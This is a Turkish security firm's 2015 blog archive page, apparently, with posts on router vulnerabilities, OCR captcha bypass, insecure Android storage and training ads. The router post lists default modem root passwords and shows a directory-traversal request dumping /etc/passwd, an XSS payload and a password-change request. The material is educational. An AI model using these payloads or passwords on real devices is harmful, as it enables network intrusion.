8 05 2015

Son yıllarda artan siber saldırı olaylarının ardından gerek bireysel, gerek kurusal gerekse de ülke güvenliği açısından siber güvenliği önemi dahada ön plana çıkmıştır. Artan saldırılar içerisinde özellikle sanayi kuruluşlarına gerçekleştirilen saldırıların yükselen bir trend göstermesi dikkat çekicidir. Gerek işletmeciler için gerek ülke ekonomisi için ciddi tehditler oluşturan bu saldırıların ekonomik açıdan da çok ciddi tehdit haline geldiği görülmeye başlanmıştır. 

Ankara Sanayi Odası ile ortak olarak gerçekleştirilecek Siber Güvenlik Konferansı oluşabilecek saldırılar karşısında sanayi kuruluşlarının farkındalık düzeyini arttırmayı amaçlamaktadır.

Tarih: 11 Mayıs 2015
Yer: Ankara 1.Organize Sanayi Bölgesi ASORA İş Merkezi - Giriş Kat Konferans Salonu 
Etkinlik Saati: 09.30 - 12.30
Bilgi Güvenliği AKADEMİSİ tarafından verilen Güvenli Yazılım Geliştirme Eğitimi' ne ait içeriğin en güncel halini SlideShare hesabımızdan yayınladık.

Aşağıdaki linkten dökümana ulaşabilirsiniz.

http://www.slideshare.net/bgasecurity/gvenl-yazilim-geltrme-etm-er






3 05 2015

Ağ Trafiğinde Pasif İşletim Sistemi ve Uygulama Tespiti

İnternet teknolojisinin yaygınlaşmasının sonucunda teknoloji sürekli kendini yenilemekte ve yeni sistemler ortaya çıkmaktadır. Bu teknolojilerden en sık karşılaşılanları kuşkusuz web sunucular,güvenlik duvarları, web uygulama güvenlik duvarları, IPS cihazları ve Load balancer(yük dengeleyici) gibi cihazlardır. 
Birçok kurumda uygulama sunucularına direk erişim olmaz ve arada sizi başka bir cihaz karşılar. Sızma testlerinde bilgi toplama aşamasında veya  ele geçirilmiş bir linux ya da windows sistemin adli bilişim çalışmalarında bağlantı esnasındaki aktörlerin kimler olduğu önemlidir.

1 05 2015

SSL Servisine Yönelik DOS Saldırıları

Önemli bilgiler (örneğin e-posta adresi, kredi kartı bilgileri, TCKN, kullanıcı adı şifre gibi) iletim esnasında kriptolu olarak iletilmelidir. HTTP clear-text protokoldür ve SSL/TLS ile korunarak HTTPS olarak yapılandırılabilir. Kriptografi algoritmaları, algoritmanın gücüne göre belirli seviyede koruma sağlayabilir.

Secure Sockets Layer(SSL) protokolü, internet üzerinden güvenli veri iletişimi sağlayan bir protokoldür. Günümüzde en çok online bankacılık işlemlerinde, sosyal ağlarda, mail sunucularında tercih edilmektedir.

30 04 2015

AP/Router Üzerinde Çıkan Zafiyetler

Access Point arabirimi, yazılımı (firmware) diğer birçok ağ cihazı gibi güvenlik zafiyetleri barındırabilirler. Bu zafiyetler ve öntanımlı hesaplar tüm kablosuz ağın güvenliğini tehlikeye atmaktadır. Aşağıda görüleceği üzere bu zafiyetler farklı markaya sahip cihazlarda çıkabilmektedir ve maalesef üreticilerden bu konuda gerekli güvenlik güncellemeleri gelmemektedir. Bu durum riskin büyüklüğünü artırmaktadır.

Genellikle gömülü Linux türevi işletim sistemleri çalıştıran bu cihazlarda popüler işletim sistemlerinde ve uygulamalardaki gibi bellek taşması türevi zafiyetler görülebilir. Bu zafiyetler cihaz üzerinde tam yetkili kod çalıştırmaya sebep olacak kritiklikte olabilirler. Böyle bir zafiyet aracılığıyla saldırgan cihazın, dolayısıyla tüm yerel ağın kontrolünü ele geçirebilir.

Airties
Örnek olarak son zamanlarda ortaya çıkan Airties modemlere ait root parolası verilebilir. İlgili zafiyete göre Air6372SO modemlerin parolasının(dsl_2012_Air) firmware üzerinden kolayca öğrenilebileceği ve uzaktan bu modemlere telnet 2323 portu üzerinden erişilebileceği görülmüştür. Aynı şekilde başka modeller üzerinde de buna benzer zafiyetler olduğu tespit edilmiştir: Airties RT-206v4 modeli root parolası: SoL_FiBeR_1357


ZTE, TP-Link, ZynOS, Huawei
Türkiye’de de sıklıkla rastlanan modem modellerinden ZTE VX10 W300 üzerinde router parolasının elde edilebileceği bir zafiyet vardır. Bu zafiyete göre

http://192.168.1.1/rom-0


dosyası basit bir GET isteğiyle herhangi bir kimlik doğrulamaya ihtiyaç duyulmadan indirilebilmektedir.

Dosya indirilerek modem yapılandırması hakkında fikir sahibi olunabilmektedir. Ancak burada router parolası ele geçirilecektir. Bunun için basit bir python script kullanılarak rom-0 dosyası okunabilir.


python rom0-decomp.py
[+] ZTE, TP-Link, ZynOS, Huawei rom-0 Configuration Decompressor
[+] Author: Osanda Malith Jayathissa
[+] Special thanks to Nick Knight


[*] Opeining rom-0 file
[+] Dump:
���� l ttnetZTE60publicpublicpublic�PPP�P�P�P�5�P�P�
                                                            �
                                                             @


[+] Filtered Strings: l ttnetZTE60publicpublicpublicPPPPPP5PP@


[~] Router Password is: ttnet


Aynı bir modemde ikinci bir zafiyet kullanılarak WAN parolası ele geçirilebilmektedir. Bunun için modem arayüzüne yukarıda ele geçirilen admin parolası kullanılarak erişilir. Interface setup, İnternet sekmesine sağ tıklanıp çerçeve kaynak kodu görüntülendiğinde PPPoE/PPPoA parolası elde edilebilmektedir.




TP-Link
İkinci bir örnek olarak TP-Link TL-WA701N  modeli 3.12.6 Build 110210 Rel.37112n firmware üzerinde Directory Traversal tipi atak tespit edilmiş. Bu atak istismar edilerek /etc/passwd dosyası okunabilmektedir.


İstek
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/


Cevap
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html


<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD><TITLE>TL-WA701N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh


Zafiyet kullanıcı adı, parola değiştirme şeklinde farklı atak vektörleriyle istismar edilebilir.


İstek
http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX
&newpassword2=XXXX&Save=Save


Veya XSS ile MAC filtreleme ayarları değiştirilebilir.


İstek

http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&
Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save

Misfortune Cookie
CVE-2014-9222 kodlu misfortune cookie zafiyeti, saldırganlara AP üzerinde kimlik doğrulamasız Administrator hakları vermektedir. RomPager isimli gömülü web sunucuda keşfedilen bu zafiyet 200'den fazla modelde mevcuttur. Saldırganlar bu zafiyeti istismar ederek tüm trafiği izleyebilirler. [Link]

UPNP
Elektronik cihazların kolayca ağa dahil olması ve birbirleriyle uyumlu çalışabilmesi amacıyla kullanılan bir servis olan UPnP üzerinde de bilinen kritik bir zafiyet vardır. Bu zafiyet istismar edilerek WAN üzerinden AP'ye uzaktan bağlantı sağlanabilir, cihazdan yapılandırma dosyaları çekilebilir. 
BGA’dan Onur ALANBEL’in MiniUPnPd üzerindeki bir zafiyet için yazdığı istismar kodu, Türkiye’de yaygın olarak kullanılan modemlere root haklarıyla bağlanarak tüm trafiği yönlendirme, yapılandırma dosyalarına erişim, vb. ataklar yapılabileceğini göstermiştir. Bulunan yığın taşması zafiyeti istismar edilerek tam yetkili erişim sağlanan örnek çalışmaya https://www.exploit-db.com/docs/36806.pdf adresinden erişilebilir. İstismar kodlarına ise https://www.exploit-db.com/exploits/36839/ bu bağlantıdan ulaşılabilir.


29 04 2015


İstismar kodu geliştirmeye yeni başlayanlar için endianness meselesi genelde kafa karıştırıcı olabilmektedir. Devam eden satırlarda “İşlemcinin little endian veya big endian olması ne demektir?” ve “İstismar kodu geliştiricisi için ne değiştirir?” soruları cevaplanmıştır.

Günümüzde kullandığımız bilgisayar mimarisinde bellekler her bir adreste bir birim (byte, word vb.) veri bulunacak şekilde tasarlanırlar. Tersten düşünülürse her bir birim veriye bir adres verilir. Aktif olarak kullandığımız ve yazının devamında kastedilen belleklerde bu birim byte’tır.

Bu yapı gereği bellekte erişilebilecek (okuma/yazma) en küçük birim byte olur. Yani bir byte’ın son 4 bitine erişmek gibi bir seçenek olmaz en az 8 bitlik işlemler yapılır. Bu sebepten bellekler byte-addressable, word-addressable gibi sınıflandırılabilir.

21 04 2015

OCR ile captcha güvenlik önleminin atlatılması



Başlıklar
  • OCR ve Tesseract nedir?
  • Linux dağıtımı üzerine tesseract kurulumu
  • Tesseract ile örnek bir resmin metine çevrilmesi
  • Captcha ve oturum(session) yönetimi
  • Örnek uygulamada captchanın atlatılması


Yazıda kullanılan materyaller : https://github.com/tnsk/captcha_bypass/


[+] OCR nedir ?


Türkçe’ye Optik Karakter Tanıma olarak çevirilen OCR, İngilizce "Optical Character Recognition" ifadesinin kısaltmasıdır. Kısaca açıklamak gerekirse herhangi bir belgenin elektronik ortamda taranıp istenilen dosya şekline getirilmesi görevini görmektedir. Tarayıcı(scanner) cihazları, akıllı telefonlar vb. cihazlar aynı mantık ile çalışmaktadır.


[+] Tesseract nedir ?


Tesseract birçok işletim sistemi için geliştirilmiş açık kaynaklı optik karakter tanımlama motorudur.1985 ve 1995 yılları arasında Hewlett-Packard tarafından tescilli olarak geliştirilmiştir. 2005 yılında açık kaynak olarak sunulmuştur. Şuan Google sponsorluğunda geliştirilmektedir.


[+] Linux üzerine tesseract kurulumu


Kurulum için https://code.google.com/p/tesseract-ocr/ bağlantısından indirilip manuel olarak derlenebilir. Eğer Debian veya Ubuntu tabanlı bir dağıtım kullanıyorsanız aşağıdaki gibi kuruluma devam edebilirsiniz.


# sudo apt-get install tesseract-ocr




[+] Tesseract ile örnek bir resmin metin'e çevrilmesi


Örnek olarak gimp aracı ile basit bir png dosyası oluşturulmuştur. Bu örnek png dosyası metine çevirilecektir.
Örnek resim aşağıdaki gibidir.
Adsız.png


Örnek resimde görüldüğü gibi resmin içerisinde Bilgi Guvenligi Akademisi yazmaktadır. Şimdi tesseract kullanarak resim içerisindeki metin, icerik isimli bir dosyaya yazılacaktır.


# tesseract test.png icerik


komutu çalıştırıldığında tesseract test.png dosyasını okuyup icerik.txt dosyasına karakterleri yazmaktadır.
Dosya görüntülendiğinde, resim dosyasında geçen metnin icerik.txt içerisine yazıldığını görmekteyiz.


[+] Captcha ve Oturum yönetimi


Captcha oluşturulduğunda kullanılan programlama dili içerisindeki gd kütüphanesi(vb kütüphaneler) bir değer tanımlar. Bu değeri resim dosyası olarak üretir ve resim dosyasındaki değeri oturuma set eder. Bazen programcıların yaptıkları bir hata, captchanın işlevini yitirmesine sebep olmaktadır. Buna örnek olarak, form içerisinde captcha geçen ve bu formu post etmek için captcha değeri girilen bir sayfa düşünülebilir. Doğrulama sayfası ilgili captcha ile oluşturulan oturumu(session) sadece 1 kere kabul etmek zorundadır. Aksi halde captcha tekrar çağırılana kadar ilk captchanın değeri oturumda geçecektir ve sayfa kontrolü gerçekleştirdiğinde captcha çağırılmadığından her istekte ilk kullanılan captcha geçerli olacaktır.


[+] Örnek uygulamada captchanın atlatılması
Uygulama çalıştırıldığında debug mod olarak koyulmuş bazı püf noktaları yer almaktadır. İstek POST olarak gönderildiğinde oturumun ekrana yazdırıldığını görmekteyiz.
İlk istekte bir önceki captcha değeri ekrana yazılmaktadır.


İlk istek :
İkinci istek :
İkinci istekteki ekran görüntüsünden anlaşıldığı gibi ilk istekteki captcha değeri oturuma atanmıştır. Burada örnek bir fuzzer yazılacaktır. Dil olarak Python tercih edilmiştir. Fuzzer'a başlamadan önce adım adım iş mantığı tekrar gözden geçirilmiştir.
Oturumun hafızada tutabilmesi için cookielib modulü kullanılmıştır. Bir opener oluşturulmuş ve opener’a cookielib eklenmiştir. Captchanın olduğu URL açtırılmış ve captcha değeri oturuma otomatik olarak eklenmiştir. Dönen cevabın body kısmı kir.png olarak kayıt edilmiş ve bu tesseract ile okutulup metin.txt içerisine yazdırılmıştır. Son olarak tekrar metin.txt’yi okutup sayfaya bu değeri captcha parametresine değer olarak verip POST isteği yapılır. Böylece captcha OCR ile atlatılmış olur. İlgili uygulamanın kodları github’da paylaşılmıştır.


NOT: Php dosyası içerisinde ilgilenenler için oturum yönetimi(session management) ile ilgili bir hata bilerek bırakılmıştır. İpucu için yazıdaki captcha kısmı incelenebilir.


20 04 2015

Android Uygulamalarda Güvensiz Veri Depolama - M2

Android işletim sistemi uygulamalara istedikleri verileri depolayabilmeleri için izole edilmiş bir alan tahsis eder, buna Internal Storage denir. Uygulama kullanıcı adı ve şifre gibi hassas verileri saklamak istediğinde Internal Storage bu işlemin gerçekleşebileceği yerdir. Android sandbox bir uygulamanın internal storage alanına diğer uygulamaların erişebilmesini engeller. Birçok geliştirici hassas verileri herhangi bir şifreleme işleminden geçirmeden internal stroage üzerinden saklamayı tercih eder.
Kullanıcı adları, yetkilendirme şifreleri ya da tokenları, çerezler, lokasyon bilgisi, kalıcı uygulama logları ya da debug bilgisi, ön belleklinmiş uygulama mesajları ya da transaction geçmişi, UDID, EMEI, kişisel bilgiler, kredi kartı veya hesap bilgisi gibi bilgiler hassas veriler olarak tanımlanabilir.
Geliştiriciler söz konusu hassas verileri SQLite veritabanlarında, log dosyalarında, plist dosyalarında, XML veri dosyalarında ya da Manifest dosyasında, binary dosyalarda, çerez dosyalarında, SD kart içerisinde ya da Bulut üzerinde depolayabilir.
İlk olarak 2010 yılında kullanıcıların rapor ettiği bildirimde (https://code.google.com/p/android/issues/detail?id=10809) e-posta bilgisinin SQL Lite veritabani üzerinde açık (cleartext) olarak tutulduğu tespit edilmiştir. Buna karşılık Android geliştirici takımı e-posta bilgisinin şifrelenmemesinin birçok nedeni olduğunu ve yetkisiz erişimlere karsı önlem alındığını belirtmiştir. Belirtilen nedenlerden ilki ise kullanılabilirliktir (https://developer.pidgin.im/wiki/PlainTextPasswords).
Güvensiz şekilde depolanan hassas verinin sızması kimlik hırsızlığı, sahtekarlık, itibar kaybı ve veri kaybı gibi sonuçlar doğurabilir.
Test Ortamı
Test ortamında InsecureBankv2 isimli uygulama kurulmuş ve güvensiz veri depolama test edilmiştir. Uygulama kurulduktan sonra ağ içerisinde verileri karşılaması için uygulama ile beraber gelen “app.py” isimli scripti çalıştırılır. Aşağıda test ortamında yapılan ayarlar gösterilmiştir.
C:\Users\user\Pictures\ayar.png
Ardından aşağıdaki ekran görüntüsünde bulunan dinesh/Dinesh@123$ hesap bilgileri ile giriş yapılmıştır.
C:\Users\user\Pictures\logın.png
Giriş yapıldıktan sonra aşağıdaki ekran ile karşılaşılmıştır.
C:\Users\user\Pictures\gırıs.png
Uygulamaya giriş yapılmıştır bu noktadan sonra cihaz üzerinde uygulamanın kullandığı SQLite veritabanı görüntülenmiştir ve uygulamaya giriş yaparken kullanılan kullanıcı adının depolandığı tespit edilmiştir. SQLite veritabanlarının içeriğini görüntüleyebilmek için bir çok uygulama bulunmaktadır ve Google Play Store’dan indirilebilir.
C:\Users\user\Pictures\db.png
Test ortamındaki uygulamada kullanıcı adı SQLite veritabanı üzerinde depolanmaktaydı bunun dışında yukarıda listelenen hassas veri sınıfına giren verilerde depolanabilirdi.
Örnek olarak 05.12.2014 tarihinde yayınlanan rapora göre Yahoo Messenger Android uygulamasında güvensiz veri depolama zafiyeti bulunmaktaydı. Uygulamayı kullanan kişinin kayıtlı/eklenmiş arkadaş listesine, reddedilen kullanıcıların listesine ve en önemlisi chat kayıtlarına açık şekilde “/data/data/com.yahoo.mobile.client.android.im/databases/” dizini altında bulunan veritabanlarından erişilebilmekteydi.


Geliştirici güvenlik adına hassas verileri depolarken şifrelemeyi seçebilir ancak saldırganlar şifreleme anahtarını çalabilir. Şifreleme anahtarı bir kez ele geçirildiğinde hassas veriler kolayca ele geçirilebilir.

19 04 2015

BGA SOME/CSIRT Ekibi TI Akreditasyonunu Tamamladı

BGA Bilgi Güvenliği bünyesinde 2014 yılında Candan BÖLÜKBAŞ liderliğinde kurulan SOME/CSIRT  ekibimiz gerekli tüm çalışmaları ve referans isterlerini tamamlayarak  15 Nisan 2015 tarihi itibariyle TI(Trusted Introducer) tarafından akredite edilmiştir. Bu çalışmayla birlikte BGA SOME/CSIRT ekibi Türkiye'deki akredite ilk özel SOME/CSIRT olma özelliğine sahip olmuştur. 
BGA olarak son 3 yılda bilgi güvenliği konusunda hizmet verdiğimiz tüm kurumlara temel SOME/CSIRT hizmetlerini 2015 yılı sonuna kadar ücretsiz olarak sunacağız.

Akreditasyon detaylarına https://www.trusted-introducer.org/directory/teams/bga-csirt.html adresinden erişim sağlanabilir.

16 04 2015



Eğitim Açıklaması
Mobil sistemlerin gündelik yaşantıda hızlı bir şekilde yerini alması, kurumsal firmaların iş yapış şekillerinde köklü değişimi de beraberinde getirmiştir. Şirket çalışanlarının mobil sistemler üzerinden iş süreçlerini yönetme çabaları kurumsal sistem güvenliği anlamında uygulama geliştiriciler için bir tehdit unsuru oluşturmaktadır. Kurumların geliştirdiği mobil uygulamalar ve kurum çalışanlarının sistemlerine kurdukları mobil uygulamalar ciddi riskleri de beraberinde getirmektedir.
Bu ihtiyaçlara yönelik olarak hazırlanan "Mobil Uygulama Güvenlik Denetimi" eğitiminde mobil sistemlere yönelik güncel tehditler ve bu tehditler karşısında alınması gereken önlemlerle birlikte mobil uygulamaların standartlara uygun olarak güvenlik testlerinin yapılması amaçlanmaktadır.
Mobil uygulama güvenlik denetimi eğitimi(Mobile Application Pentest) iOS ve Android platformları için çeşitli simülasyonlar kullanılarak gerçekleştirilmekte ve OWASP Top 10 Mobil Uygulama Güvenlik Denetimi listesini kapsamaktadır.


Eğitim Seviyesi
Uzman Seviyesi

Kimler Katılmalı
Bu eğitim, IT güvenlik görevlileri, denetçiler, güvenlik uzmanları, site yöneticileri ve ağ altyapı bütünlüğü konusunda çalışmalar yapan herkes için önemli ölçüde yarar sağlayacaktır.

Ön Gereksinimler
Temel programlama bilgisine sahip herkes katılabilmektedir

Eğitim Süresi
3 Gün

Eğitim Yerleri ve Tarihleri

İstanbul:
Eğitim Tarihleri-I: 8-10 Mayıs 2015

Eğitim Adresi: 19 Mayıs Mah. İnönü Cad. Çetinkaya İş Merkezi No:92 Kat:4 KADIKÖY/İSTANBUL

Diğer eğitimlere  ait takvim bilgisi için: http://www.bga.com.tr/training-schedule.html

Eğitim Ücreti ve Kayıt
Lütfen egitim@bga.com.tr adresine "Mobil Uygulama Guvenlik Denetimi Egitimi" konulu e-posta gönderiniz..

Sertifika
Eğitime katılanlara, BGA tarafından katılım sertifikası verilecektir.

Eğitim İçeriği

Mobil Dünyada Genel Kavramlar
  • Mobil Dünya Tanımı
  • Mobil Dünyada İşletim Sistemli ve Platformlar
  • BlackBerry, Windows Mobile, Android, iOS, Symbian
  • MDM(Mobile Device Management) Kavramı
  • BYOD Kavramı ve Kurumsal Ortamlar için Getirdiği Riskler
  • 2012 Yılına Ait Mobil Güvenlik Raporları
Android, iOS Dünyasına Giriş
  • Anrdoid İşletim Sistemi Temelleri
  • Güvenlik Açısından Android, iOS Karşılaştırması
  • Mobil Uygulama Güvenlik Denetimi için Ortam Oluşturma
  • iPhone ve iPad icin test ortamı oluşturma
  • iOS SDK Yükleme, XCode Ayarları
  • XCode üzerinden iPhone simulatoru çalıştırma
  • XCode üzerinden iPad simulatoru çalıştırma
  • iPad/iPhone uygulamalarını decompile etme
  • Jabilbreak Kavramı, Getirileri ve Riskleri
  • Android Uygulamaları için Test Ortamı Oluşturma
  • Android Emulator Kurulumu ve Yönetimi (adb)
Mobil Uygulama Güvenlik Denetimleri Başlıkları
  • Bilgi toplama
  • Dinamik Analiz
  • Statik Analiz
  • Bilgi Toplama Adımları
  • Mobil Uygulama İletişim Yöntemlerinin Belirlenmesi
  • -Wifi, -NFC, -GSM, -3G, -Bluetooth
  • İstemci-sunucu Arasında İletişim amaçlı Kullanılan Protokollerin Güvenlik Analizi
  • Uygulamaların iletişim kurduğu Açık Sistemlerin Belirlenmesi
  • Dinamik Analiz İçin Gerekli Bileşenler
Mobil Uygulama Test Araçları
  • Mobil Sistemlerde Çıkmış güvenlik Zafiyetleri
  • Mobil Uygulamalarda Araya Girme ve Parametre Manipülasyonu
Owasp Top 10 Mobile App. Security Denetimi
  • M1: Insecure Data Storage
  • M2: Weak Server Side Controls
  • M3: Insufficient Transport Layer Protection
  • M4: Client Side Injection
  • M5: Poor Authorization and Authentication
  • M6: Improper Session Handling
  • M7: Security Decisions Via Untrusted Inputs
  • M8: Side Channel Data Leakage
  • M9: Broken Cryptography
  • M10: Sensitive Information Disclosure
Statik Analiz İçin Gerekli Bileşenler
  • Mobil Uygulama Kaynak Kod Denetimi
  • Mobil Uygulama Binary(ikili dosya) Analizi
  • Mobil Uygulama Decompile İşlemleri
  • Kaynak Kod Analizi için Kullanılan Araçlar
    • Ticari araçlar
    • Açık kaynak, ücretsiz araçlar
  • Binary Analizi Amaçlı Kullanılan Araçlar
  • Mobil Sistemlerde Adli Bilişim Analizi Temelleri
  • Mobil Sistemlerde Zararlı Yazılım Analiz Yöntemleri
UA-17586270-1